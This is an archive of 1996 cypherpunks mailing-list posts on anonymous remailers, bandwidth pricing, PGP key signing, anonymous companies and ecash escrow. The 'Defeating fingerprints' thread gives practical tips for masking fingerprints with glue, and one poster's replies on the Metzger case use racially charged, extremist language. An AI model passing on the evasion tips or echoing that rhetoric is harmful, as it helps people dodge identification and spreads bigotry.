I can imagine total anonymity used most successfully when it is limited to activities which are totally electronic in nature, like programming, web design or ecash transfers.  The more that a virtual company requires physical contact with the construction, storage, and movement of physical goods, and the more time that it engages the individuals involved, the more difficult it will be to keep away from everyone the knowledge of who is who in relation to those things and where everything is located in physical space.

I was thinking that I couldn't see purchasing groceries anonymously (if I made the purchases myself).  Perhaps with a certain kind of store design.....still, it would be difficult.  *Someone* would see me walking out with the groceries (why does this sound so funny).

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 19:20:36 +0800
To: cypherpunks@toad.com
Subject: Re: "Too cheap to meter"
Message-ID: <199605180723.AAA25334@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:54 PM 5/17/96 -0700, Timothy C. May wrote:
>At 2:38 AM 5/16/96, Alan Horowitz wrote:
>>Hey, let's build faster and faster fiber-optic networks. Let's create
>>bandwidth so cheap that it won't even pay to meter it.
> "Too cheap to meter" goes away pretty quickly.

Don't be so sure about that, Tim.  While it is probably true that service 
must be rationed, one way to do that is simply to charge based on the data 
rate of your modem.  When, soon, fiber normally runs at that 20 Gb/sec rate 
of this new AT+T fiber, that represents about 700,000 connections at 
28.8kbps, solid.  Based on normal statistical useage, it's probably closer 
to 3-4 million connections.  And that's only one fiber.  

Data-transmission companies need to make money, but they don't necessarily 
have to make that money by measuring actual transmitted data.  This is 
similar to cable-TV companies who (with the exception of pay-per-view) don't 
charge based on how long you watch TV.  The reason, obviously, is  that it 
is no more expensive for them  if you watch your TV 24 hours per day, than 5 
minutes per day.  Since fiber optic systems don't wear out with usage, and 
their capacities are exceedingly large, it would certainly be possible for 
these companies to start charging based entirely on maximum transfer speed.

 




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 19 May 1996 05:24:56 +0800
To: cypherpunks@toad.com
Subject: Re: Forced to your knees by Legal VIOLENCE
In-Reply-To: <199605180030.RAA06625@netcom11.netcom.com>
Message-ID: <Pine.GUL.3.93.960518010958.19939C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996, Dave Harman wrote:

> IMHO, the IDEAL remailer is the following:
> 
> What CAN be done right now, with anyone with linux and shell unix,
> account paid by fake name/address with postal money order,
> is have the linux machine dial up the account, several times a day,
> process the mailbox, download the mail, process the mail with pgp or 
> mixmaster, upload to account, post/email with the appropriate 
> header lines and VOILA!!  
> 
> !!!!!!!!!! FULL FEATURED HACKTIC STYLE REMAILER !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
> 
> Unfortunately I DON'T know how to DO any of this.
> Isn't someone else want to crank something out and share?
> Post around instructions for the clueless to follow.

Actually, you can be even more clueless than that and still run a
remailer, pretty much as you describe. See:

 http://www.c2.org/~winsock/

But that requires MicroSnot software rather than Linux, and of course,
your ISP is liable to shut you down, without notice, as soon as they
realize what you're doing. The service location and survivability problems
remain. 

The POP/SMTP remailer idea has a lot of promise forprospective remailer
operators who are clueless and/or lack a full-time net connection, but you
still need to be upfront with your ISP about the fact that you're running
a remailer. The best ISPs will let you. I'm quite impressed with Portal
(or does Hal have something on them?), but I doubt Netcom would let you
into the remailer racket. 

c2.org, of course, has enough remailers on it already, but I did play
with the WinSock Remailer for a bit. It should be quite trivial to hack
something like it together for Linux. Just run fetchmail or whatever as a
POP client, pipe the mail spool to your mixmaster, and SMTP away.

-rich
 http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/m/metzger.tom
 http://www.almanac.bc.ca/cgi-bin/ftp.pl?orgs/american/war
 http://www.free.cts.com/crash/m/metzger/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sat, 18 May 1996 21:46:18 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating fingerprints
In-Reply-To: <199605172219.PAA20898@netcom11.netcom.com>
Message-ID: <96May18.012757edt.10522@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Shellac or epoxy glue does NOT work, if the thickness is at all managable.

Not that random playing with carcinogenic chemicals is a good idea, but...
I've found that if you use just one reagent from epoxy glue, the collagen
in your skin will disolve.  You can sculpt it into whatever shape you want,
and it will stay that way for an hour or so.  I don't remember if it was
the resin or the hardener though.  This was regular 5 minute epoxy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 18 May 1996 21:55:34 +0800
To: jamesd@echeque.com
Subject: Re: anonymous companies
In-Reply-To: <199605171837.LAA09867@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.93.960518012208.5178A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996 jamesd@echeque.com wrote:

> In some businesses we can solve this problem by cryptographic control
> mechanisms, such as open books banking.  In others, such as net startups,
> I see no solution other than increased reliance on personal individual
> capital.

I've seen the phrase "open books" used several times in the past on this
list. Can anyone explain what it means or provide some references? 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 20:51:52 +0800
To: cypherpunks@toad.com
Subject: [Yadda Yadda Heil Dave] Re: Forced to your knees by Legal VIOLENCE
In-Reply-To: <199605180030.RAA06625@netcom11.netcom.com>
Message-ID: <Pine.GUL.3.93.960518012941.19939D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I responded to Skippy's on-topic, more or less substantive questions about
remailers in Message-ID
<Pine.GUL.3.93.960518010958.19939C-100000@Networking.Stanford.EDU>
This has absolutely nothing to do with crypto, but that's what I
subscribed to coderpunks for.

On Fri, 17 May 1996, Dave Harman wrote:

> Ask our resident "free speech for RESPECTABLE dissidents,"
> L. Lurch@stanford.edu (racial capitali$t d0g)
> for a virulent defense of Co$ style tactics against racists.
> Ask him about SPLC, Seraw vs WAR, Tom, John METZGER.

I grew up 15 minutes from Metzger and played soccer with one of his kids,
and he threatened some friends of mine.  I've talked to his sidekick Wyatt
Kaldenberg about other things, and defended their absolute right to free
speech on occasion. But other than that, I don't know much about Metzger.
Skippy seems to have this illusion that I'm some big bad anti-racist,
which I find amusing. 

Another WAR/CoS mal-analogy one could scrawl is that Metzger has paid
about as much of the judgement awarded to the murder victim's family as
CoS has paid to Wollersheim. But I wouldn't follow that line of reasoning
myself, since I'm no fan of the SPLC. Maybe they did a good thing in the
Seraw murder case, but their current suit agaist Pierce's neo-Nazi
National Alliance seems rather SLAPP-ish to me.  I'm sure Morty would try
to justify going after deep-pocket racists by saying that they deserve it
because the $4.5 million or so that The Order White Nationalist
Revolutionary [cough] Movement liberated from banks and convenience stores
has never been recovered, but he's wrong. Sure Bobby claimed to be doing
those robberies in the name of the Aryan Cause, but it looks like he
really spent the money on himself, just like any other "political" crook
(the Contras, the FMLN, Sendero, the Machateros, the US Congress, etc).

The SPLC probably has a web server somewhere with more details, but
there's a minimal amount of information about the case at:

 http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/m/metzger.tom
 http://www.almanac.bc.ca/cgi-bin/ftp.pl?orgs/american/war

Tom Metzger's web page (sorry, it's actually John Metzger's web page,
which happens to carry all sorts of stuff from Tom -- you see, facing a 
$10 court judgement upheld by the Supreme Court, Tom has sworn an oath of
poverty to avoid giving the Zionist Occupational Government any more
blood money)  is at:

 http://www.free.cts.com/crash/m/metzger/

-rich
 http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 19 May 1996 01:48:58 +0800
To: cypherpunks@toad.com
Subject: Re: "Too cheap to meter"
In-Reply-To: <adc27a68070210046471@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960518020843.19939E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996, Timothy C. May wrote:

> At 2:38 AM 5/16/96, Alan Horowitz wrote:
> >Hey, let's build faster and faster fiber-optic networks. Let's create
> >bandwidth so cheap that it won't even pay to meter it.
> 
> "Too cheap to meter"? Wasn't that what nuclear power promised in the 1950s?
> 
> (I'm actually a supporter of nuclear power, for a variety of reasons, so
> this is not meant as just a cheap shot against nuke plants. But this was
> one of the "selling points" of nuclear, later shown to be a falsehood.)

Actually, nuclear power, per se, is damn cheap. It's the collateral
effects (real, i.e., waste disposal and keeping fissile materials secure
from terrorists, and imagined, i.e., overregulation) that are so
expensive.

Just like the net. We could have a virtually free flow of information, but
that's not exactly what the gubmint wants, is it. Not to mention that it's
not exactly what we want, either -- Canter & Siegel are only the tip of
the iceberg of the Tragedy of the Commons we'd see on a truly free
network. 

We don't need the CDA or anything quite that stupid, but I'll drink to
overpriced, arbitrarily restricted net access any day.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 19 May 1996 02:02:33 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605170432.VAA23960@dfw-ix9.ix.netcom.com>
Message-ID: <Pine.GUL.3.93.960518021629.19939F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 May 1996, Bill Stewart wrote:

> 4) I suppose if you're going to hack the remailer anyway,
> you could add a feature that adds a trailer like
> ==================================================================
> This message was posted from the anonymous remailer at www.jim.com.
> Send any complaints to webmaster@www.jim.com .
> Please don't post any copyrighted material longer than fair use quotations.
> And did you know that Scientology's highly overpriced documents say that
>         "<random paragraph quotation>"
> ===================================================================

Once I was more or less done laughing and got off the floor, it occurred
to me that this could provide a revenue stream for anonymous remailers. 
You'd charge advertisers sub-pennies for these little trailers. I
understand that Sameer is getting very little Ecash for his
remail/by-www.html, but maybe if he sold advertising space?

Sure it's crass, but it supposedly works for Juno, the "free email" 
service...

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 20:56:13 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating fingerprints
In-Reply-To: <199605172219.PAA20898@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.93.960518035503.7337A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996, Dave Harman wrote:

> Shellac or epoxy glue does NOT work, if the thickness is at all managable.
> Tried it, The ridges always find a way to get through.
> It also provides a weaker bond to dry skin than you'd expect.
> The thicker the more likelihood of peeling off.
> Even Krazy Glue. (The UL BS is false.)

Use krazy glue gel.  Works wonderfully for me.

> 
> --
> Serenity, Etc.
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 18 May 1996 23:44:55 +0800
To: cypherpunks@toad.com
Subject: Re: [Yadda Yadda Heil Dave] Re: Forced to your knees by Legal VIOLENCE
In-Reply-To: <Pine.GUL.3.93.960518012941.19939D-100000@Networking.Stanford.EDU>
Message-ID: <199605181058.DAA24165@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> I responded to Skippy's on-topic, more or less substantive questions about
> remailers in Message-ID
> <Pine.GUL.3.93.960518010958.19939C-100000@Networking.Stanford.EDU>
> This has absolutely nothing to do with crypto, but that's what I
> subscribed to coderpunks for.
> 
> On Fri, 17 May 1996, Dave Harman wrote:
> 
> > Ask our resident "free speech for RESPECTABLE dissidents,"
> > L. Lurch@stanford.edu (racial capitali$t d0g)
> > for a virulent defense of Co$ style tactics against racists.
> > Ask him about SPLC, Seraw vs WAR, Tom, John METZGER.
> 
> I grew up 15 minutes from Metzger and played soccer with one of his kids,
> and he threatened some friends of mine.  I've talked to his sidekick Wyatt
> Kaldenberg about other things, and defended their absolute right to free
> speech on occasion. But other than that, I don't know much about Metzger.
> Skippy seems to have this illusion that I'm some big bad anti-racist,
> which I find amusing. 

Another non-rebutted rebuttal.  I care nothing about yours or
Metzgers personal life, this is FAR ramnificated severity.

And, the anology I made CLEARLY was the similarity between 
Co$ and SPLC; And the VICTIMS: WAR and Wollersheim,Fishman,etc.
CO$ AND WAR DON'T HAVE THE SLIGHTEST RESEMBLANCE!!!:

> Another WAR/CoS mal-analogy one could scrawl is that Metzger has paid
> about as much of the judgement awarded to the murder victim's family as
> CoS has paid to Wollersheim. But I wouldn't follow that line of reasoning
> myself, since I'm no fan of the SPLC. Maybe they did a good thing in the

And, the anology I made CLEARLY was the similarity between 
Co$ and SPLC; And the VICTIMS: WAR and Wollersheim,Fishman,etc.
CO$ AND WAR DON'T HAVE THE SLIGHTEST RESEMBLANCE!!!:

> Seraw murder case, but their current suit agaist Pierce's neo-Nazi
> National Alliance seems rather SLAPP-ish to me.  I'm sure Morty would try

SPLC vs WAR set the SHOCKING precedent.

> to justify going after deep-pocket racists by saying that they deserve it
> because the $4.5 million or so that The Order White Nationalist
> Revolutionary [cough] Movement liberated from banks and convenience stores
> has never been recovered, but he's wrong. Sure Bobby claimed to be doing

ADL claimed $50,000 was funneled to NA from the beginning.
No proof whatsoever, as they havn't pressed the matter to proceedings.

> those robberies in the name of the Aryan Cause, but it looks like he
> really spent the money on himself, just like any other "political" crook
> (the Contras, the FMLN, Sendero, the Machateros, the US Congress, etc).

You mean he laundered the money right before his death, and
his hiers got it all?  WOW!  What a Don!

> The SPLC probably has a web server somewhere with more details, but
> there's a minimal amount of information about the case at:
> 
>  http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/m/metzger.tom
>  http://www.almanac.bc.ca/cgi-bin/ftp.pl?orgs/american/war

These say nothing.  SPLC has avoided the net, because
it's two periodicals are so embarrassing to the anti-racists.
You need to go to the library and check up on Klanwatch
for the years 89-93 for the sordid details.

> Tom Metzger's web page (sorry, it's actually John Metzger's web page,
> which happens to carry all sorts of stuff from Tom -- you see, facing a 
> $10 court judgement upheld by the Supreme Court, Tom has sworn an oath of

$10,200,000!!!!   25% of income confiscated for 20 years!!!

> poverty to avoid giving the Zionist Occupational Government any more
> blood money)  is at:

Ignoroid, ALL the Metzger funds are being transfered with
the large mulatto Seraw family as sole beneficiary.
Co$/SPLC political harassment cases are NOT done to
raise funds, but suppress organisation.

>  http://www.free.cts.com/crash/m/metzger/
> 
> -rich
>  http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html
> 
> 


-- 
		God grant me the serenity to accept
		the things I cannot change,
		the courage to change the things I can,
		and the wisdom to know the difference




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 May 1996 23:39:55 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: S-Tools 4 now available [for MS only?]
Message-ID: <199605180409.VAA08135@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Matts Kallioniemi <matts@pi.se>
              roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
              cypherpunks@toad.com

** Reply to note from Matts Kallioniemi <matts@pi.se> 05/16/96 10:21pm +0200

= Date: Thu, 16 May 1996 22:21:20 +0200 
= To: roy@sendai.cybrspc.mn.org (Roy M. Silvernail), cypherpunks@toad.com 
= From: Matts Kallioniemi <matts@pi.se> 
=  
= Subject: Re: S-Tools 4 now available

	roy is a microsofter --of course, is it written for microsquish and 
    their compiler/api fad of the month? 

	is source code available, or is the code non-portable outside the 
    limited interpreters and compilers of MS?

	32 bit is obsolete --64 bits is the standard.  after all there are 
    other systems except MS.

	I have a simple policy regarding MS --I just don't!



--
  "Bill Gates is greedy because he has amassed a fortune of
        US$ 15,000,000,000 ($15 billion)
   but the US Government is a helpful Village because it takes
        US$ 1,400,000,000,000 ($1.4 trillion) from us each year
        and does good things with it."
                --Hillary Clinton






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 May 1996 18:01:08 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: re: SEVERE undercapacity, we need more remailers
Message-ID: <199605180409.VAA08193@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Black Unicorn <unicorn@schloss.li>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Black Unicorn <unicorn@schloss.li> 05/15/96   
6:29pm -0400  
 
= I would really like to see a remailer that is somehow blinded.  
=   
	on a message basis --it is not really possible if the logs are 
    maintained or the fed are already monitoring the stream --which is 
    probable if they are after something --and it will increase 
    geometically if we get Bubba again.  
  
	there are a number of very sophisticated ways to play the game,  
but 
    each requires a real "Web of Silence"  --what makes your  
counterpart 
    reliable?  where do we establish that "Web of Trust" which everyone 
    bandies about. 
 
        who are the two plants for our current chain? or is this just 
    another case of sowing dissension by the feds?  I only know two or  
    three at most of the players on the remailers at all --and that is  
a 
    passing knowledge, not acquaintance. 
  
= I don't know enough about how mail paths are generatered, but is it  
= impossible to conceal the origin of remailer postings?  
= 
        impossible to conceal each orientation, but I have been playing  
    with several easy techniques which are sufficiently obfuscatory  
    that the Feds will not have the horsepower to break them unless  
    someone provides them with the methodology --that in itself  
violates 
    how we (cp) have always insisted on 'post it' and get on with the 
    attempted destruction.  even if they break the methodology, they  
    gain very little v. the technique. 
 
= Postings made to remailernym@alpha.c2.org would be spit out 
= somewhere but = without accountability?  
=  
        sure, possible if you wish to play the game with a "Web of  
    silence." 
  
= Impossible?  Would do wonders defeating traffic analysis.  
=  
        no, not impoosible. just who wants to be responsible for  
    something the NSA assholes can not own --and compromise?  they get  
    down right shitty when they kick your door down in the middle of  
the 
    night as take your carcass away --if nothing else works, off to  
    Springfield you go --without charges --lest we forget the crippled  
    president or Hustler magazine  --that is what they did to him  
    _before_ they convicted him, _and_ after. 
  
= I'd consider running a remailer, but after listening to the response  
to  
= the anonymous poster a while back, it sounds like there are few if  
any  
= simple options which do not require major time and effort to setup  
and  
= run.  
=  
        you can run it out of your client account on an IAP --there's  
    nothing special about it in a simplified form. 
 
        I could support a remailer point if I could manage to get the  
    necessary "Web of Silence" counterparts --one them preferable  
    foreign. 
 
        BTW, it does not need to be complex to add another level of  
    confusion. usually the best offensives are the simplest. 
         
== 
= Opp. Counsel: For all your expert testimony needs:  
jimbell@pacifier.com  
= 
        is this subtle, crass, or just not? 
 
 


--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 19 May 1996 05:00:52 +0800
To: t byfield <hieronym@desk.nl>
Subject: Re: Senator, your public key please?
In-Reply-To: <v03006600adc32fbc08ec@[193.0.0.2]>
Message-ID: <Pine.SUN.3.93.960518041217.7337C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, t byfield wrote:

> 6:01 PM  +0200 5/16/96, Black Unicorn:
> 
> > Secondly, the Ethics Committee was very interested in the issue.  As of
> > now they have ruled that "exchanging" PGP signatures is an "exchange in
> > kind" and an ethics violation.  Ms. Howell expressed exasperation over
> > this lunacy, but put it much this way:  "No, you guys don't understand
> > what the issues are here, but I don't have 3 hours to explain it all to
> > you either."  Apparently the ethics committee is concerned that a
> > signature from Leahy's key will constitute some sort of endorsement and the
> > "you sign mine and I'll sign yours" looks like influence peddling.
> 
> 	And, in fact, according the general outlines of the "reputation"
> schemes advanced hereabouts, they're right: that's why they call it
> "reputation _capital_," mais oui?

Well, this depends on what we assume a signature does.

> 	There's no reason that webs of trust of well-signed keys couldn't be
> very fluidly incorporated into patronage networks, for example, or that
> their incorporation would affect network dynamics in any notable way. One
> doesn't need to understand political theory or economy in any analytical
> sense to become part of a patronage network, and one doesn't need to
> understand cryptography to know  what a key is vaguely enough to be swayed
> by someone waving a "well-signed" key around--in fact, _not_ understanding
> cryptography will lead people to be wowed by such keys.

I'm not sure I agree with this "mysticism" of key signatures.  The Senator
can sign an autograph if he likes, why not a key?

> Most people don't
> understand cryptography, and most will continue not to understand it. So in
> the pristine realm of mathematics, the Ethics Committee may be wrong, but
> in the real world of sloppy thinking they're basically right. Basically.

"They are corrected because everyone else is an idiot."  Is that about the
thrust of your argument?  While technically it may have some merit, I
think its highly dangerous to legislate and regulate based on assumptions
about what people _may_ think.

> 	If my key was signed _only_ by the CEOs of the top 10 Fortune 500
> companies, a few dozen heads of state,  bigwig spooks from around the
> world, the pope and a dozen cardinals, it's not too hard to imagine how I
> could open a few doors with that key--and make a buck or two in the process.

This depends on the intrepretation of the meaning of signature.

> 	After all, Uni, what _does_ a signature signify? You were asking some
> very pointed questions about that quite recently.

Precisely, and in the absence of an answer to this question which is more
substantial I think assuming that Senators and CEO's intended to vouch for
your financial or character reputation is stretching it a bit.  But hey,
I'm not on the Ethics Committee.

> 
> Ted
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 18 May 1996 22:02:06 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why the Poor are Mostly Deserving of their Fate
In-Reply-To: <adc286c5080210044c33@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960518041937.11104A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


It was understandable to be poor when all the world was poor.  It is 
understandable to be poor in those nations today that make the 
accumulation of wealth a crime for most people.  It is not understandable 
to be poor (for long) in the US where one can reliably get out of poverty 
simply by doing three simple things:

1) get a high school diploma
2) get married
3) get any job

Only about 2 tenths of 1% of those who satisfy those three requirements
incomes below the official poverty line.

Like most libertarians, I dislike the government.  I don't care what a 
person's income is.  When I was self-supporting on an income of $200 a 
month in 1979, I was below the poverty level for a single person myself.  
I am not enamored of the rich or poor members of the dependendant classes 
of course.

I try and keep in mind that 80-90% of the "take" in government 
programs for the "poor" goes to unpoor government employees.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@fahlgren.com>
Date: Sat, 18 May 1996 23:38:22 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: S-Tools 4 now available
In-Reply-To: <2.2.32.19960516202120.0038302c@mail.pi.se>
Message-ID: <199605181037.GAA10219@goffer.ee.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Matts" == Matts Kallioniemi <matts@pi.se> writes:

Matts> At 17:41 1996-05-13 CST, Roy M. Silvernail wrote:

>> <sigh> I suppose this is market pressure, but it means you are
>> alienating a number of potential users (including myself).  Some of
>> us are working toward being Microsoft-free, you know.

Matts> It's not just marketing, it's a fact of life. 16 bit operating
Matts> systems are not supported any more. Just as 8 bit OSes haven't
Matts> been supported for quite a while either. There will come a day
Matts> when 64 bits are considered the minimum for useful software
Matts> (large database systems are already there).

Matts> You just can't stick with 16 bits forever, MS-free or not. Face
Matts> it.

What does being MS-Free have to do with 16-bit operating systems? I'm
another MS-free potential user, and I'm always in either 32 or 64-bit
land. 

Live free or die.

C Matthew Curtin                                         Just Another Hacker
http://users1.ee.net/cmcurtin/            PGP Public Key ID: cmcurtin@ee.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 18 May 1996 23:44:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Too cheap to meter"
Message-ID: <199605181102.HAA26641@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 May 96 at 18:54, Timothy C. May wrote:
[..]
> Alan's irony is well-placed. The most egregious repetition of the "too
> cheap to meter" nonsense is George Gilder's "dark fiber" vision...a vision
> of "infinite bandwidth" to all users.
> 
> Guess what? If Gilder's "dark fiber" is ever built, there are a lot of
> folks who will "fill it" rather quickly. Canter and Siegel were just the
> beginning. "Too cheap to meter" goes away pretty quickly.

Remember not-so-many-years-ago when 640k PCs were awsome and a 40MB 
HD was unfillable?

A better phrase is "if you build it, they will fill it (eventually)".

Rob.

 
---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Brochet <ben@bb-soft.com>
Date: Sat, 18 May 1996 18:15:51 +0800
Subject: Re: crosspost re remailers
Message-ID: <1379719292-14657485@bb-soft.com>
MIME-Version: 1.0
Content-Type: text/plain


WHO IS THE MODERATOR OF THIS LIST ?

I've been victim of a spoofing from a german.... he suscribed me to 2200 
mailing list... also I'd to be unsuscribed from your list !

 ---------------------------------------------------
IBB Software - Benjamin Brochet - Solutions InternetI
I Creation - Hebergement - Consulting - Formations  I
I                                                   I
I    http://www.bb-soft.com - ftp.bb-soft.com       I
I              info@bb-soft.com                     I
 ---------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 19 May 1996 03:53:01 +0800
To: jamesd@echeque.com
Subject: Re: anonymous companies
In-Reply-To: <199605171837.LAA09867@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.93.960518083235.7337H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996 jamesd@echeque.com wrote:

> At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
> >
> > I'll just give one problem: the principal-agent problem.  How do owners of
> > the company make sure the managers operate the company in their best
> > interest?
> 
> Actually looting of companies happens a lot right now today, and very
> seldom leads to criminal charges.  Twice I have lost a job because the
> company I worked for went under, apparently due to looting.

Be careful to distingiush "owner" from "employee."  All to common a
mistake I fear.

Until someone passes a constitutional right to not be fired, well, you're
employeed at the will and by the good grace of the owners and your boss.

> > Solution: reputation.  If the managers don't do the right things, the
> > owners arrange so that the managers lose reputation and won't get hired in
> > the future.  Unfortunately the science of reputation is not so advanced
> > that we know this will actually work.
> 
> At present venture capitalists seem to rely on the sniff-their-arses
> method.  They talk to people and try and get a feel as to whether they
> are planning a robbery.  This method is obviously likely to be less
> effectual as businesses move to the net.

And even this is vulnerable to "last round" problems.

> In some businesses we can solve this problem by cryptographic control
> mechanisms, such as open books banking.

I really wish someone would publish a paper on this.  (hint hint).

> In others, such as net startups,
> I see no solution other than increased reliance on personal individual
> capital.

Still, vulnerable to last round problems.

> Athenian capitalism worked largely on personal capital.  Because of their
> terrible arithmetic system, bookkeeping was really bad, and in consequence
> stock investments tended to go sour.  Socrates lost a bundle in this 
> fashion, which may explain his lack of enthusiasm for capitalists.

He also made a killing on predicting crops by his knowledge of the
weather.  Go with what you know.  If you aren't a good corporate analyist,
that's what mutual fund managers are for.

> > Solution: smart contracts.  This is Nick Szabo's idea of building
> > contractual obligations into cryptographic protocols so that the parties
> > have no choice but to fullfil them.  But again we don't know whether this
> > will actually work for this problem.
> 
> It will work for many particular cases of this problem.

But what happens when there are nuances or circumstances which contracts
do not anticipate?  This "complete" reliablity is also a curse for
flexibility which fast moving entities need to survive.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 19 May 1996 02:26:17 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: A cryptographic alternative to escrow agents (Matts' half coin)
In-Reply-To: <2.2.32.19960517185942.003ae7a4@mail.pi.se>
Message-ID: <Pine.SUN.3.93.960518092421.7337J-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996, Matts Kallioniemi wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Black Unicorn wrote (was: Why does the state still stand)
> 
> >> .  What if a company does not pay as expected - other than adopting
> >> Assassination Politics, what method could an employee use towards
> >> getting their expected remuneration for work done?
> >
> >If payment is made weekly, it should be made in advance to an escrow agent
> >who would issue a certificate that the payment for employee r2dd54 has
> >been received.  The payment would then not be released to anyone without
> >the consent of the corporation and the employee.
> >
> >Obviously the escrow agent would have to be trusted.
> 
> It should be possible to avoid that trusted escrow agent using blinded
> ecash and Matts' half coin algorithm.
> 
> Bob wants to buy a $100 service from Alice. Alice wants to get paid if she
> performs the service.
> 
> Bob and Alice each create half of a $300 ecash coin. They send their half
> coins to the ecash mint for signing, with instructions to withdraw $200
> from Bob's account and $100 from Alice's account for the signing of a
> $300 coin.
> 
> When the mint has received both half coins, it signs the complete coin,
> withdraws the money and returns the signature to both Alice and Bob.
> Nobody can now use the coin alone because they don't know the other half
> of the random coin number.

